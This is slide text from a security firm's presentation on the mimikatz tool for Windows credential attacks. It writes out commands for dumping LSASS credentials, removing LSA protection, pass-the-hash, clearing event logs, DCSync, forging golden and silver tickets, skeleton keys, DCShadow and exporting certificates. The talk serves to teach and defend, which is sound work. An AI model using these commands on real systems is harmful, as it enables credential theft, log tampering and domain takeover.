Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Compliance, Protection & Business Confidence 31 August 18 mimikatz A little tool to play with Windows security Prashant Mahajan 

31 August 18 https://www.redbubble.com/people/gentilkiwi/portfolio 

Answer to the Ultimate Question of Life, the Universe, and Everything 31 August 18 Mimikatz is 

31 August 18 Coffee J 

31 August 18 Minesweeper J https://twitter.com/M_haggis/status/1032798552517423105 

31 August 18 mimikatz https://github.com/gentilkiwi/mimikatz 

• Benjamin DELPY, you can contact him on Twitter (@gentilkiwi) or by mail (benjamin [at] gentilkiwi.com) or visit his blog (http://blog.gentilkiwi.com/) • Vincent LE TOUX, a few contributions to mimikatz including the DCSync function in lsadump module, you contact him on Twitter (@mysmartlogon) or by mail (vincent.letoux [at] gmail.com) or visit his website (http://www.mysmartlogon.com) 31 August 18 Authors 

Agenda 31 August 18 • sekurlsa::logonpasswords • Just scratching the surface on the capabilities • SekurLSA module • Event module • DCSync • Golden Ticket • Silver Ticket • Skeleton Key • SIDHistory • DCShadow 

• After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. • This is meant to facilitate Single Sign-On (SSO) ensuring a user isn’t prompted each time resource access is requested. • The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords to support WDigest and SSP authentication among others. 31 August 18 Credentials in Memory ? ! https://adsecurity.org/?page_id=1821 

31 August 18 Credential Data Chart Benjamin Delpy posted an Excel chart on OneDrive (no longer available) http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png 

31 August 18 sekurlsa::logonpasswords 

31 August 18 Malicious https://twitter.com/gentilkiwi/status/937384097642635264 https://www.virustotal.com/#/file/e46ba4bdd4168a399ee5bc2161a8c918095fa30eb20ac88cac6ab1d6dbea2b4a/detection 

31 August 18 EXE / PS1 / DLL https://twitter.com/gentilkiwi/status/887823565046910977 https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/ 

procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords 31 August 18 ProcDump or Task Manager https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 

31 August 18 No Debug Privs ? ! 

31 August 18 No Debug Privs ? ! https://twitter.com/gentilkiwi/status/1032161555964723200 https://twitter.com/gentilkiwi/status/1032270189444911104 

The Local Security Authority (LSA), which resides within the Local Security Authority Security Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1 but is on by default in Windows RT 8.1 and cannot be changed. 31 August 18 RunAsPPL https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management 

privilege::debug !processprotect /process:lsass.exe /remove sekurlsa::logonpasswords J 31 August 18 RunAsPPL 

31 August 18 SekurLSA module 

31 August 18 Pass the Hash sekurlsa::pth /user:da /domain:sos.labs /ntlm:eaabfdbde55b39c1a9b8d6786afd251e /run:powershell.exe 

privilege::debug Get Debug Privs J event::drop Patch Events service to avoid new events. event::clear Clear the event log without any log cleared event (1102) being logged. 31 August 18 Event module 

31 August 18 LSADump module 

31 August 18 SAM 

31 August 18 Cache 

31 August 18 DCSync lsadump::dcsync /domain:sos.labs /all /csv 

31 August 18 kerberos module 

31 August 18 https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf 

• A Golden Ticket (GT) is a TGT using the KRBTGT NTLM password hash to encrypt and sign. • A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. • Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. • The GT contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821 

To summarize, once an attacker gets access to the KRBTGT password NTLM/RC4/AES128/AES256, they can create Golden Tickets (TGT) that can provide access to anything in AD at any time. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21-513 • Domain Admins SID: S-1-5-21-512 • Schema Admins SID: S-1-5-21-518 • Enterprise Admins SID: S-1-5-21-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21-520 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821 

kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt • /user – account to be impersonated or any username • /id – RID of the account to be impersonated. This could be a real account ID, such as the default administrator ID of 500, or a fake ID. • /groups - list of groups to which the account in the ticket will belong • /sids – to insert a SID into the SIDHistory attribute of the account in the ticket • /ptt – Pass the Ticket to load the golden ticket into the current session 31 August 18 Golden Ticket 

A Silver Ticket is a TGS (similar to TGT in format) using the AD computer/service account (can be identified by SPN) NTLM password hash to encrypt and sign. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21-513 • Domain Admins SID: S-1-5-21-512 • Schema Admins SID: S-1-5-21-518 • Enterprise Admins SID: S-1-5-21-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21-520 31 August 18 Silver Ticket https://adsecurity.org/?page_id=1821 

kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /server:http /ptt • /target –the host (SPN value). sos.labs domain has dc1.sos.labs • /service –the name of the service that we will create tickets for (must be a service running as the service account) • /user –the user that the ticket will be created for, and this can be any user account whatsoever, even user accounts that do not exist • /groups - list of groups to which the account in the ticket will belong to. Domain Admins is included by default • /rc4 – NTLM hash of the account or /aes128 /aes256 keys 31 August 18 Silver Ticket 

31 August 18 Misc module 

31 August 18 DisableCMD 

31 August 18 Clip 

• Inject Skeleton Key into LSASS process on Domain Controller. • This enables all user authentication to the Skeleton Key patched DC to use a “master password (mimikatz)” (aka Skeleton Keys) as well as their usual password. • Reboot removes the Skeleton Key injection. 31 August 18 Skeleton Key 

31 August 18 Security Identifiers (SID) module 

31 August 18 SIDHistory 

31 August 18 SIDHistory 

31 August 18 SIDHistory 

Start the mimidrv service Elevate to SYSTEM 31 August 18 DCShadow 

31 August 18 DCShadow 

Running as SYSTEM 31 August 18 DCShadow 

Running as Domain Admin 31 August 18 DCShadow 

31 August 18 DCShadow 

What can you do ? • Add user to privileged groups such as Domain Admins, Enterprise Admins • Add SIDHistory • Change PrimaryGroupID • Etc 31 August 18 DCShadow 

The following permissions on AD Object’s are required: Domain object • DS-Install-Replica (Add/Remove Replica in Domain) • DS-Replication-Manage-Topology (Manage Replication Topology) • DS-Replication-Synchronize (Replication Synchornization) Sites object in the Configuration container • CreateChild and DeleteChild Computer object of the attacker's machine (which is registered as a Fake DC) • WriteProperty Target object (user or computer or ADSPath) • WriteProperty 31 August 18 DCShadow https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1 

31 August 18 

31 August 18 Privilege module 

31 August 18 Crypto Module 

mimikatz # privilege::debug Privilege '20' OK mimikatz # crypto::cng "KeyIso" service patched mimikatz # crypto::capi Local CryptoAPI patched mimikatz # crypto::certificates /export * System Store : 'CURRENT_USER' (0x00010000) * Store : 'My' mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE mimikatz # crypto::keys /export 31 August 18 

31 August 18 net module 

31 August 18 Process module 

31 August 18 RPC module 

31 August 18 Service module 

31 August 18 System Environment Value module 

31 August 18 Token manipulation module 

31 August 18 Terminal Server module 

31 August 18 IIS XML Config module 

31 August 18 Data Protection API module 

Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Questions? 

Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Thank You! © 2002 – 2018 Sense of Security Pty Limited. All rights reserved. Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher.